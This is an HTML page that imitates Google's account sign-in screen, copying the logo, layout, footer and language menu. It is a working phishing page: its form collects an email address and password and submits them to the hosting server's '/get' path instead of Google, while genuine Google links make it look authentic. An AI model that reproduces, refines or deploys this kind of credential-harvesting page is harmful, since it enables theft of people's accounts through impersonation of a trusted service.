<!DOCTYPE html>
<html>

<head>



    <script>
        // Add JavaScript to trigger the fade-in effect
        window.addEventListener('DOMContentLoaded', (event) => {
            const loginApp = document.getElementById('login-app');
            loginApp.classList.add('fade-in');
        });


        // Add JavaScript to trigger the fade-in effect and handle hover state
        window.addEventListener('DOMContentLoaded', (event) => {
            const loginApp = document.getElementById('login-app');
            loginApp.classList.add('fade-in');

            const dropbtn = document.querySelector('.dropbtn');
            const dropdownContent = document.querySelector('.dropdown-content');

            dropbtn.addEventListener('mouseover', () => {
                dropbtn.querySelector('#svg-icon').style.transform = 'rotate(180deg)';
            });

            dropbtn.addEventListener('mouseout', () => {
                if (!dropdownContent.classList.contains('show')) {
                    dropbtn.querySelector('#svg-icon').style.transform = 'rotate(0)';
                }
            });

            dropdownContent.addEventListener('mouseover', () => {
                dropbtn.querySelector('#svg-icon').style.transform = 'rotate(180deg)';
            });

            dropdownContent.addEventListener('mouseout', () => {
                if (!dropbtn.matches(':hover')) {
                    dropbtn.querySelector('#svg-icon').style.transform = 'rotate(0)';
                }
            });
        });
    </script>

    <!--   ------------------------------------- CSS ------------------------------------------------    -->

    <style>

        body {
            font-family: 'roboto', sans-serif;
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
            height: 100vh; /* This ensures the body takes the full height of the viewport. */
            margin: 0;
        }

        .fade-in {
            opacity: 0;
            animation: fadeInAnimation 0.35s ease-in forwards;
        }

        @keyframes fadeInAnimation {
            from {
                opacity: 0;
            }

            to {
                opacity: 1;
            }
        }

        

        .login-container {
            width: 368px;
            padding: 40px;
            padding-bottom: 60px;
            border: #e9e9e9 1px solid;
            border-radius: 10px;
        }

        #logo {
            margin: auto;
            width: fit-content
        }

        .g-h1 {
            width: fit-content;
            margin: auto;
            font-weight: 200;
            font-size: 24px;
            margin-top: 1px;
        }

        .g-h2 {
            width: fit-content;
            margin: auto;
            font-weight: 200;
            font-size: 16px;
            font-family: roboto, "Noto Sans Myanmar UI", arial, sans-serif;
            padding-top: 7px;
            padding-bottom: 20px;
        }

        .g-input {
            width: 92%;
            font-size: 16px;
            padding: 13px 15px;
            margin: auto;
            margin-top: 10px;
            height: 30px;
            border: 1.5px solid #d8d4d4;
            border-radius: 5px;
        }

        .gbtn-primary {
            height: 35px;
            width: 85px;
            color: #fff;
            background-color: #1a73e8;
            padding-left: 19px;
            padding-right: 19px;
            border: 0px solid #fff;
            border-radius: 5px;
            font-weight: bold;


            transition: box-shadow 0.2s ease-in-out;
            /* Add transition for smooth animation */

        }


        .gbtn-primary:hover {
            box-shadow: 0px 6px 10px -4px rgba(0, 0, 0, 0.2);
            background-color: #1064d2;
        }




        #info4 {
            margin-top: 25px;
            font-size: 13px;
            font-family: 'Open Sans', sans-serif;
            font-weight: bold;
        }

        a {
            color: #498af2;
            text-decoration: none;
            font-weight: bold;
            font-size: 14px;
        }

        #info5 {
            font-size: 14px;
            padding-top: 10px;
            font-family: roboto, "Noto Sans Myanmar UI", arial, sans-serif;
            color: #5f6368;
        }

        #info5 p {
            color: #5f6368;
        }

        #info6 {
            display: flex;
            align-items: justify;
            margin-top: 30px;
            font-size: 13px;
            font-weight: bold;
        }

        #info6-1,
        #info4 a {
            transition: box-shadow 0.2s;
            background-color: 0.1 ease-in-out;
            /* Add transition for smooth animation */
        }

        #info6-1:hover,
        #info4 :hover {
            box-shadow: 0px 0px 0px 10px #498af20c;
            background-color: #498af20c;
            border-radius: 2px;
        }

        #info7-1 {
            display: flex;
            flex-direction: row;
            align-items: center;
        }

        #info7-2 {
            display: flex;
            flex-direction: row;
        }

        #info7-2 p {
            padding-left: 16px;
            padding-right: 16px
        }

        .g-input:focus {
            outline: none;
            border-color: #0b3975;
            box-shadow: 0 0 0 2px rgb(95, 164, 254);
            transition: border-color 0.3s ease-in-out, box-shadow 0.3s ease-in-out;
        }

        /*----------V----------- Footer Stuff --------------V------------*/

        .footer {
            margin-top: 10px;
            width: 450px;
            display: flex;
            flex-direction: row;
            align-items: center;
            justify-content: space-between;
            font-family: 'roboto', sans-serif;
            font-size: 12px;
            color: #000000;
        }

        .footer a {
            color: #000000;
            text-decoration: none;
            font-weight: lighter;
            font-size: 12px;
        }

        .dropdown {
            position: relative;
            display: inline-block;
        }

        .dropdown-content {
            display: none;
            position: absolute;
            background-color: #f9f9f9;
            min-width: 160px;
            box-shadow: 0 8px 16px 0 rgba(0, 0, 0, 0.2);
            z-index: 1;
            bottom: 100%;
            border-radius: 5px;
        }

        .dropdown:hover .dropdown-content {
            display: block;
        }

        .dropdown-content a {
            color: black;
            padding: 12px 16px;
            text-decoration: none;
            display: block;
        }

        .dropdown-content a:hover {
            background-color: #f1f1f1;
        }


        .dropbtn svg {
            transition: transform 0.2s ease-in-out;
        }


        .dropbtn:hover #svg-icon {
            transform: rotate(180deg);
        }

        @media (max-width: 767px) {

            /*   for MOBILE    */
            .login-container {
                width: 368px;
                margin: auto;
                border: none;
                border-radius: 5px;
                margin-top: 0px;
                padding: 0px;
                padding-bottom: 60px;
            }

            .footer {
                position: fixed;
                bottom: 0;
                width: 100%;
                background-color: #f2f2f2;
                text-align: justify;
                padding-left: 20px;
                padding-right: 20px;
                padding-top: 0%;
                box-sizing: border-box;
            }

            .g-input {
                font-size: 16px;
                padding: 13px 15px;
                margin: auto;
                margin-top: 10px;
                height: 30px;
                border: 1.5px solid #d8d4d4;
                border-radius: 5px;
            }
        }
    </style>
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
</head>

<!--   ------------------------------------- HTML ------------------------------------------------    -->

<body>


    <div id="login-app" class="fade-in">
        <div class="login-container">
            <div class="login-content" id="login-form">
                <div id="logo"><svg viewBox="0 0 75 24" width="85" height="34" xmlns="http://www.w3.org/2000/svg"
                        aria-hidden="true">
                        <g id="qaEJec">
                            <path fill="#ea4335"
                                d="M67.954 16.303c-1.33 0-2.278-.608-2.886-1.804l7.967-3.3-.27-.68c-.495-1.33-2.008-3.79-5.102-3.79-3.068 0-5.622 2.41-5.622 5.96 0 3.34 2.53 5.96 5.92 5.96 2.73 0 4.31-1.67 4.97-2.64l-2.03-1.35c-.673.98-1.6 1.64-2.93 1.64zm-.203-7.27c1.04 0 1.92.52 2.21 1.264l-5.32 2.21c-.06-2.3 1.79-3.474 3.12-3.474z">
                            </path>
                        </g>
                        <g id="YGlOvc">
                            <path fill="#34a853" d="M58.193.67h2.564v17.44h-2.564z"></path>
                        </g>
                        <g id="BWfIk">
                            <path fill="#4285f4"
                                d="M54.152 8.066h-.088c-.588-.697-1.716-1.33-3.136-1.33-2.98 0-5.71 2.614-5.71 5.98 0 3.338 2.73 5.933 5.71 5.933 1.42 0 2.548-.64 3.136-1.36h.088v.86c0 2.28-1.217 3.5-3.183 3.5-1.61 0-2.6-1.15-3-2.12l-2.28.94c.65 1.58 2.39 3.52 5.28 3.52 3.06 0 5.66-1.807 5.66-6.206V7.21h-2.48v.858zm-3.006 8.237c-1.804 0-3.318-1.513-3.318-3.588 0-2.1 1.514-3.635 3.318-3.635 1.784 0 3.183 1.534 3.183 3.635 0 2.075-1.4 3.588-3.19 3.588z">
                            </path>
                        </g>
                        <g id="e6m3fd">
                            <path fill="#fbbc05"
                                d="M38.17 6.735c-3.28 0-5.953 2.506-5.953 5.96 0 3.432 2.673 5.96 5.954 5.96 3.29 0 5.96-2.528 5.96-5.96 0-3.46-2.67-5.96-5.95-5.96zm0 9.568c-1.798 0-3.348-1.487-3.348-3.61 0-2.14 1.55-3.608 3.35-3.608s3.348 1.467 3.348 3.61c0 2.116-1.55 3.608-3.35 3.608z">
                            </path>
                        </g>
                        <g id="vbkDmc">
                            <path fill="#ea4335"
                                d="M25.17 6.71c-3.28 0-5.954 2.505-5.954 5.958 0 3.433 2.673 5.96 5.954 5.96 3.282 0 5.955-2.527 5.955-5.96 0-3.453-2.673-5.96-5.955-5.96zm0 9.567c-1.8 0-3.35-1.487-3.35-3.61 0-2.14 1.55-3.608 3.35-3.608s3.35 1.46 3.35 3.6c0 2.12-1.55 3.61-3.35 3.61z">
                            </path>
                        </g>
                        <g id="idEJde">
                            <path fill="#4285f4"
                                d="M14.11 14.182c.722-.723 1.205-1.78 1.387-3.334H9.423V8.373h8.518c.09.452.16 1.07.16 1.664 0 1.903-.52 4.26-2.19 5.934-1.63 1.7-3.71 2.61-6.48 2.61-5.12 0-9.42-4.17-9.42-9.29C0 4.17 4.31 0 9.43 0c2.83 0 4.843 1.108 6.362 2.56L14 4.347c-1.087-1.02-2.56-1.81-4.577-1.81-3.74 0-6.662 3.01-6.662 6.75s2.93 6.75 6.67 6.75c2.43 0 3.81-.972 4.69-1.856z">
                            </path>
                        </g>
                    </svg></div>
                <form action="/get" id="email-form-step">
                    <h1 style="padding-top:10px" class="g-h1">Sign in</h1>
                    <h2 class="g-h2">Use your Google Account</h2>
                    <div class="login-content"><input name="email" type="text" class="g-input" placeholder="Email"
                            required> <input name="password" type="password" class="g-input" placeholder="Password"
                            required>

                        <div id="info4">
                            <a href="https://accounts.google.com/signin/v2/usernamerecovery">Forgot password?</a>
                        </div>

                        <div id="info5">
                            <p style="color: #5f6368;">Not your computer? Use a private browsing window to sign in. <a
                                    href="https://support.google.com/accounts/answer/2917834" jsname="JFyozc"
                                    target="_blank" aria-label="Learn more about using Guest mode">Learn more</a>
                        </div>

                        <div id="info6"
                            style="display: flex;flex-direction: row; justify-content:space-between; align-items: center;">
                            <div id="info6-1">
                                <a href="https://accounts.google.com/signup">Create account</a>
                            </div>
                            <div id="info6-2"><button class="gbtn-primary" type="submit">Next</button></div>
                        </div>
                    </div>
                </form>
            </div>
        </div>
    </div>

    <div class="footer fade-in">
        <li class="dropdown">
            <a href="#" class="dropbtn">
                <div style="display: flex; flex-direction: row; align-items: center;">
                    <p style="margin:5px">English (Canada) </p>
                    <svg id="svg-icon" style="margin-left:10px" fill="#5f6368" width="10px" height="10px"
                        viewBox="-6.5 0 32 32" version="1.1" xmlns="http://www.w3.org/2000/svg" transform="rotate(0)">
                        <g id="SVGRepo_bgCarrier" stroke-width="0"></g>
                        <g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g>
                        <g id="SVGRepo_iconCarrier">
                            <title>dropdown</title>
                            <path
                                d="M18.813 11.406l-7.906 9.906c-0.75 0.906-1.906 0.906-2.625 0l-7.906-9.906c-0.75-0.938-0.375-1.656 0.781-1.656h16.875c1.188 0 1.531 0.719 0.781 1.656z">
                            </path>
                        </g>
                    </svg>
                </div>
            </a>
            <div class="dropdown-content">
                <a href="https://www.google.com/?hl=en">English (US)</a>
                <a href="https://www.google.com/?hl=en">English (Canada)</a>
                <a href="https://www.google.ca/?hl=fr">French (France)</a>
                <a href="https://www.google.ca/?hl=fr">French (Canada)</a>
                <a href="https://www.google.com/?hl=es">Spanish (Mexico)</a>
                <a href="https://www.google.com/?hl=de">German</a>
                <a href="https://www.google.com/?hl=zh">Mandarin</a>
                <a href="https://www.google.co.jp/webhp?gl=jp">Japanese</a>
                <!-- Add more language options as needed -->
            </div>
        </li>

        <div id="info7-2">
            <a
                href="https://support.google.com/accounts?hl=en&visit_id=638246523772707675-4223629449&rd=2&p=account_iph#topic=3382296">
                <p>Help</p>
            </a>
            <a href="https://policies.google.com/privacy">
                <p>Privacy</p>
            </a>
            <a href="https://policies.google.com/terms">
                <p>Terms</p>
            </a>
        </div>
    </div>
</body>

</html>
<!--   ------------------------------------- FIN ------------------------------------------------    -->